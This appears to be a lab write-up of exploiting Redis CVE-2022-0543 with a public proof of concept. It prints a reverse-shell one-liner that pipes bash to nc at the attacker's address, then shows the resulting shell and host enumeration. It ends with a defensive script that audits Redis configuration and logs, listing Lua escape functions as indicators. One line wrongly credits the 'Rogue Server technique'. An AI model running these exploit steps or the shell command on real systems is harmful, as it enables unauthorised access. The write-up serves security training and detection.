Lua Sandbox Escape
The target Redis instance runs version 5.0.14. Testing it for the Lua sandbox escape, CVE-2022-0543.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ git clone https://github.com/0x7eTeam/CVE-2022-0543 ; cd CVE-2022-0543
Cloning into 'CVE-2022-0543'...
remote: Enumerating objects: 19, done.
remote: Counting objects: 100% (19/19), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 19 (delta 4), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (19/19), 69.74 KiB | 2.40 MiB/s, done.
Resolving deltas: 100% (4/4), done.
Cloning the PoC repository to Kali
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys/CVE-2022-0543]
└─$ python3 CVE-2022-0543.py -i $IP
/home/kali/PEN-200/PG_PRACTICE/readys/CVE-2022-0543/CVE-2022-0543.py:5: SyntaxWarning: invalid escape sequence '\ '
version = """
[#] Create By ::
_ _ ___ __ ____
/ \ _ __ __ _ ___| | / _ \ / _| | _ \ ___ _ __ ___ ___ _ __
/ _ \ | '_ \ / _` |/ _ \ | | | | | |_ | | | |/ _ \ '_ ` _ \ / _ \| '_ \
/ ___ \| | | | (_| | __/ | | |_| | _| | |_| | __/ | | | | | (_) | | | |
/_/ \_\_| |_|\__, |\___|_| \___/|_| |____/ \___|_| |_| |_|\___/|_| |_|
|___/ By https://aodsec.com
Please input redis ip:
>>192.168.154.166
Please input redis port:
>>6379
Auth:
>>Ready4Redis?
input exec cmd:(q->exit)
>>id
b'uid=107(redis) gid=114(redis) groups=114(redis)\n'
Code execution confirmed
>>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.45.218 9999 >/tmp/f
Sending a reverse shell
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.218] from (UNKNOWN) [192.168.154.166] 41058
bash: cannot set terminal process group (1277): Inappropriate ioctl for device
bash: no job control in this shell
redis@readys:/var/spool/cron$ whoami
whoami
redis
redis@readys:/var/spool/cron$ hostname
hostname
readys
redis@readys:/var/spool/cron$ ifconfig
ifconfig
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.154.166 netmask 255.255.255.0 broadcast 192.168.154.255
inet6 fe80::250:56ff:fe9e:d748 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:9e:d7:48 txqueuelen 1000 (Ethernet)
RX packets 2231876 bytes 247702863 (236.2 MiB)
RX errors 0 dropped 355 overruns 0 frame 0
TX packets 1479640 bytes 259301307 (247.2 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 2410 bytes 238538 (232.9 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2410 bytes 238538 (232.9 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Initial foothold established on the target system as the redis account via the Redis Rogue Server technique.
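As a defender-side counterpart to the session above, the following Python script (an added example, not code from this writeup or from the 0x7eTeam repository) audits a redis.conf for the settings that leave Lua scripting reachable from the network, and scans MONITOR-style command lines for EVAL / SCRIPT LOAD calls that reference the Lua `package` library or process-spawning functions, which is the indicator of this class of sandbox escape. The configuration fragments, the log lines, the client addresses and the password placeholder are all constructed for the example; the log line format assumed is the one `redis-cli MONITOR` prints.

```python
"""Defender-side checks for the Redis Lua scripting attack surface.

Added example: audits a redis.conf and a MONITOR capture for the conditions
that made the CVE-2022-0543 path in the session above possible. Every input
below is a constructed sample, not data taken from the target host.
"""
import re

# Lua names a sandboxed Redis script must never be able to reach. Seeing them
# inside an EVAL or SCRIPT LOAD argument is a strong indicator of a sandbox
# escape attempt against an unpatched Debian/Ubuntu redis package.
SUSPICIOUS_LUA = ("package.loadlib", "io.popen", "os.execute", "loadstring")

# MONITOR line shape: `<timestamp> [<db> <client-addr>] "CMD" "arg" ...`
MONITOR_RE = re.compile(r'^(?P<ts>\S+) \[(?P<db>\d+) (?P<client>\S+)\] (?P<rest>.*)$')

# Constructed samples (placeholder password, made-up addresses).
SAMPLE_CONF = """
# exposed configuration, constructed for the example
bind 0.0.0.0
protected-mode no
port 6379
requirepass <placeholder-password>
"""

HARDENED_CONF = """
# hardened configuration, constructed for the example
bind 127.0.0.1
protected-mode yes
port 6379
requirepass <placeholder-password>
rename-command EVAL ""
rename-command EVALSHA ""
"""

SAMPLE_MONITOR = r'''
1700000000.100000 [0 10.0.0.5:50000] "AUTH" "(redacted)"
1700000000.200000 [0 10.0.0.5:50000] "GET" "session:42"
1700000000.300000 [0 10.0.0.5:50000] "EVAL" "local lib = package.loadlib(...)" "0"
1700000000.400000 [0 10.0.0.9:50001] "SET" "note" "package.loadlib is just text here"
'''


def parse_conf(text):
    """Return {directive: [value, ...]} for the non-comment lines of a redis.conf."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        conf.setdefault(key.lower(), []).append(value.strip())
    return conf


def _is_loopback(addr):
    return addr.startswith("127.") or addr in ("::1", "localhost")


def audit_conf(text):
    """Return findings for settings that widen the Lua scripting attack surface."""
    conf = parse_conf(text)
    findings = []
    bind = conf.get("bind", ["0.0.0.0"])[0]  # Redis 5 listens on all interfaces by default
    if not all(_is_loopback(a) for a in bind.split()):
        findings.append(f"bind {bind}: Redis reachable from non-loopback addresses")
    if conf.get("protected-mode", ["yes"])[0].lower() != "yes":
        findings.append("protected-mode no: loopback-only safety net for passwordless instances disabled")
    if "requirepass" not in conf:
        findings.append("requirepass missing: no authentication required")
    renamed = {v.split()[0].upper() for v in conf.get("rename-command", []) if v.split()}
    for cmd in ("EVAL", "EVALSHA"):
        if cmd not in renamed:
            findings.append(f"{cmd} exposed: Lua scripting reachable by any authenticated client")
    return findings


def flag_monitor(text):
    """Return (client, command, indicator) for scripting calls carrying escape indicators.

    Only EVAL and SCRIPT (LOAD) carry a script body; matching every command would
    flag ordinary data writes that merely contain the same text (see the SET line).
    """
    hits = []
    for line in text.splitlines():
        m = MONITOR_RE.match(line.strip())
        if not m:
            continue
        rest = m.group("rest")
        cmd = rest.split('"')[1].upper() if '"' in rest else ""
        if cmd not in ("EVAL", "SCRIPT"):
            continue
        for needle in SUSPICIOUS_LUA:
            if needle in rest:
                hits.append((m.group("client"), cmd, needle))
                break
    return hits


if __name__ == "__main__":
    for name, conf in (("exposed", SAMPLE_CONF), ("hardened", HARDENED_CONF)):
        print(f"[{name}] {audit_conf(conf) or 'no findings'}")
    print("monitor hits:", flag_monitor(SAMPLE_MONITOR))
```

The real fix for CVE-2022-0543 is the distribution's updated redis package, because the bug was in how Debian/Ubuntu built the bundled Lua interpreter, leaving the `package` library reachable from scripts; the `rename-command` entries above are a compensating control that also breaks any application relying on EVAL, so treat them as a finding to review rather than a blanket recommendation.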